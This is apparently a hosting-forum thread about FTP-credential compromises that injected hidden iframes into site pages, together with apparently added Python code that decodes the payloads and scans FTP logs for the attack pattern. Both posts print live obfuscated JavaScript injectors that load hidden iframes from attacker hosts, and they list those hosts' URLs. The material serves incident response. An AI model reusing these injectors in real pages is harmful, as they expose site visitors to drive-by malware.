IP addresses from IFrame Hacks

claudio

Well-Known Member
Jul 31, 2004
Sadly, it happened to me today.

WARNING: do not run this code; it also tries to redirect to blacksun-sl.com/arm/index.php

<!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script><!-- ~ --><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script>


1) First, this thing came from my personal FTP account:

Jan 24 01:14:03 main pure-ftpd: ([email protected])

2) My password was strong.

3) Was there malware/spyware, a trojan or a keylogger on my desktop computer? Well, give me a few days and we will know, because I did change the FTP password from all my machines, and I will not use FTP and will track /var/log/messages to see if this fellow can "guess" my password using his magic trojan, or if a very common DC has a sniffer in his network, which is not the case (it apparently started near to an FTP session of mine, but I mean apparently, not clearly).

4) PHP insecure permissions or scripts were not found on my server; I know how it is, and it was just pure-ftpd.

Before, in the "less-secure" proftpd, it didn't happen; I have been looking at these threads since Jan/2007, when they started.

Thinking of changing back to proftpd.

5) Other customers weren't affected.

6) Some system crashes and lockup/freeze issues happened near to this also.

7) Kernel, cPanel, Perl all up to date since the cPanel 10 to cPanel 11 change.

8) Also checked http://www.cpanel.net/security/notes/random_js_toolkit.html, but this is not (by now) my case, as there is no rootkit or root access at all despite these successful FTP attempts.

9) chmod -w *.* in my public_html

If the hacker does it again, I will disable my FTP USER permanently...
 
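To see what the injected script above writes into the page without executing it in a browser, here is a port of its dc() decoder to Python. This is an added analysis example, not the poster's code: the substitution table and the encoded argument are copied from the posted script, the bit-packing and XOR are exactly what the JavaScript does, and iframe_targets() (a helper name chosen here) pulls the src URLs out of the decoded HTML so they can be blocked at the proxy or grepped for across other customers' public_html.

```python
"""Offline port of the dc() decoder from the injected script (added example)."""
import re

# Substitution table copied verbatim from the posted script; the index is
# the character's code minus 48, so '0' is index 0 and 'z' is index 74.
TABLE = [63, 39, 22, 35, 48, 8, 18, 24, 29, 21, 0, 0, 0, 0, 0, 0, 36, 60, 52,
         47, 43, 44, 3, 62, 15, 9, 0, 55, 19, 5, 40, 57, 42, 56, 33, 34, 26, 7,
         61, 11, 27, 12, 17, 0, 0, 0, 0, 53, 0, 37, 59, 25, 6, 10, 51, 13, 54,
         23, 45, 20, 38, 41, 2, 49, 46, 30, 16, 28, 50, 58, 32, 4, 31, 1, 14]

# The argument passed to dc() in the posted script.
ENCODED = ("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsK"
           "W28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")


def dc(encoded: str) -> str:
    """Decode the custom base64 variant used by the script.

    Each character maps through TABLE to a 6-bit value; values are packed
    LSB-first into a bit buffer, and every completed byte is XORed with
    165 before being emitted. This mirrors the JavaScript statement by
    statement (JS '165^w&255' is 165 ^ (w & 255) because & binds tighter).
    """
    out, w, s = [], 0, 0
    for ch in encoded:
        w |= TABLE[ord(ch) - 48] << s
        if s:
            out.append(chr(165 ^ (w & 255)))
            w >>= 8
            s -= 2
        else:
            s = 6
    return "".join(out)


# Matches the src attribute of any iframe in decoded HTML (quoted or not).
SRC_RE = re.compile(r"""<iframe[^>]*\ssrc=["']?([^"'\s>]+)""", re.IGNORECASE)


def iframe_targets(html: str) -> list:
    """Return the URLs that decoded HTML would load in hidden iframes."""
    return SRC_RE.findall(html)


if __name__ == "__main__":
    decoded = dc(ENCODED)
    print(decoded)
    for url in iframe_targets(decoded):
        print("iframe target:", url)
```

Running it prints the hidden 0x0 iframe the script injects, whose target is the blacksun-sl.com/arm/index.php URL mentioned in the warning; the decoder and the URL list are the useful artifacts for a firewall rule or a grep over the rest of the server.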

ModServ

Well-Known Member
Oct 17, 2006
Egypt
cPanel Access Level: Root Administrator
FTP connection with user password from: 77.221.133.186

Code added to index.html:
Code:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
The code contains links to:
Code:
http://77.221.133.188/.if/go.html?19427401f
http://77.221.133.188/.dif/go.php?sid=1
http://77.221.133.189/.sp/in.cgi?p=t
The same here, with the same IP.

Look:

Code:
Jan 29 10:11:52 server7 pure-ftpd: ([email protected]) [INFO] New connection from 77.221.133.186
Jan 29 10:11:52 server7 pure-ftpd: ([email protected]) [INFO] xxxxx is now logged in
Jan 29 10:12:03 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/suspended.page/index.html downloaded  (4521 bytes, 18025.59KB/sec)
Jan 29 10:12:04 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/suspended.page/index.html uploaded  (4401 bytes, 26.92KB/sec)
Jan 29 10:12:05 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/index.php downloaded  (17803 bytes, 649.81KB/sec)
Jan 29 10:12:06 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/index.php uploaded  (18785 bytes, 28.79KB/sec)
Jan 29 10:12:07 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/login.php downloaded  (10275 bytes, 760.74KB/sec)
Jan 29 10:12:08 server7 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/vb/login.php uploaded  (10332 bytes, 31.66KB/sec)
Jan 29 10:12:09 server7 pure-ftpd: ([email protected]) [INFO] Logout.
!!!!

What will be done about this??
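The triage this report calls for, as an added example (not code from either poster): decode the hex-pair payload quoted above to learn which host it loads, then scan pure-ftpd log lines for the download-then-re-upload pattern visible in the log, which is how a stolen-credential session rewrites a site's index and login pages in a few seconds. The log lines in the code are constructed to mirror the posted ones (pure-ftpd's usual (user@ip) prefix restored where the forum had redacted it, plus two benign sessions from a documentation IP); the 60-second window and the helper names are assumptions made here.

```python
"""Added triage example: decode the injected script, then flag FTP sessions
that fetch a web file and put a modified copy straight back."""
import re
from datetime import datetime

# The hex string from the document.write() call in the post, split only for
# line length; every two hex digits encode one character of the script.
HEX_PAYLOAD = (
    "3C5343524950543E77696E646F772E7374617475733D27446F6E65273B"
    "646F63756D656E742E777269746528273C696672616D65206E616D653D"
    "633737386536356239373065207372633D5C27"
    "687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F"
    "272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B27"
    "3031665C272077696474683D353136206865696768743D333831"
    "207374796C653D5C27646973706C61793A206E6F6E655C27"
    "3E3C2F696672616D653E27293C2F5343524950543E"
)


def decode_hex_pairs(hexstr: str) -> str:
    """Undo the two-hex-digits-per-character encoding the injected script uses."""
    return bytes.fromhex(hexstr).decode("latin-1")


HOST_RE = re.compile(r"""https?://([^/'"\\\s]+)""")


def hosts_in(text: str) -> set:
    """Hosts referenced by URLs in decoded script text (the IoCs to block)."""
    return set(HOST_RE.findall(text))


# Constructed sample lines modelled on the posted pure-ftpd log.
SAMPLE_LOG = [
    "Jan 29 10:11:52 server7 pure-ftpd: (?@77.221.133.186) [INFO] New connection from 77.221.133.186",
    "Jan 29 10:11:52 server7 pure-ftpd: (xxxxx@77.221.133.186) [INFO] xxxxx is now logged in",
    "Jan 29 10:12:03 server7 pure-ftpd: (xxxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/suspended.page/index.html downloaded  (4521 bytes, 18025.59KB/sec)",
    "Jan 29 10:12:04 server7 pure-ftpd: (xxxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/suspended.page/index.html uploaded  (4401 bytes, 26.92KB/sec)",
    "Jan 29 10:12:05 server7 pure-ftpd: (xxxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/index.php downloaded  (17803 bytes, 649.81KB/sec)",
    "Jan 29 10:12:06 server7 pure-ftpd: (xxxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/index.php uploaded  (18785 bytes, 28.79KB/sec)",
    "Jan 29 10:12:07 server7 pure-ftpd: (xxxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/login.php downloaded  (10275 bytes, 760.74KB/sec)",
    "Jan 29 10:12:08 server7 pure-ftpd: (xxxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/login.php uploaded  (10332 bytes, 31.66KB/sec)",
    "Jan 29 10:12:09 server7 pure-ftpd: (xxxxx@77.221.133.186) [INFO] Logout.",
    # Benign owner activity (constructed): a fresh upload, and an edit cycle
    # that takes over an hour, neither of which should be flagged.
    "Jan 29 11:40:10 server7 pure-ftpd: (owner@198.51.100.7) [NOTICE] /home/owner//public_html/news.html uploaded  (2048 bytes, 40.00KB/sec)",
    "Jan 29 11:41:00 server7 pure-ftpd: (owner@198.51.100.7) [NOTICE] /home/owner//public_html/about.html downloaded  (3000 bytes, 40.00KB/sec)",
    "Jan 29 12:50:00 server7 pure-ftpd: (owner@198.51.100.7) [NOTICE] /home/owner//public_html/about.html uploaded  (3100 bytes, 40.00KB/sec)",
]

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ pure-ftpd: "
    r"\((?P<user>[^@)]*)@(?P<ip>[^)]+)\) \[(?P<lvl>\w+)\] (?P<msg>.*)$"
)
XFER_RE = re.compile(r"^(?P<path>/\S+) (?P<dir>downloaded|uploaded)\s+\((?P<bytes>\d+) bytes")


def scan_ftp_log(lines, window=60):
    """Return (ip, path, seconds, size_delta) for every file that one source IP
    downloads and then re-uploads within `window` seconds (assumed threshold)."""
    pending = {}   # (ip, path) -> (download time, download size)
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        x = XFER_RE.match(m["msg"])
        if not x:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        key, size = (m["ip"], x["path"]), int(x["bytes"])
        if x["dir"] == "downloaded":
            pending[key] = (ts, size)
        elif key in pending:
            t0, size0 = pending.pop(key)
            gap = int((ts - t0).total_seconds())
            if 0 <= gap <= window:
                findings.append((m["ip"], x["path"], gap, size - size0))
    return findings


if __name__ == "__main__":
    print("payload loads from:", hosts_in(decode_hex_pairs(HEX_PAYLOAD)))
    for ip, path, gap, delta in scan_ftp_log(SAMPLE_LOG):
        print(f"{ip} rewrote {path} {gap}s after fetching it ({delta:+d} bytes)")
```

The decoded payload's host (77.221.133.188) sits in the same /24 as the FTP source (77.221.133.186), which is the "same IP" observation in the post, and the size delta tells you roughly how much was injected into each file (the suspended-page index actually shrank, so a size check alone would miss it; the timing is the reliable signal).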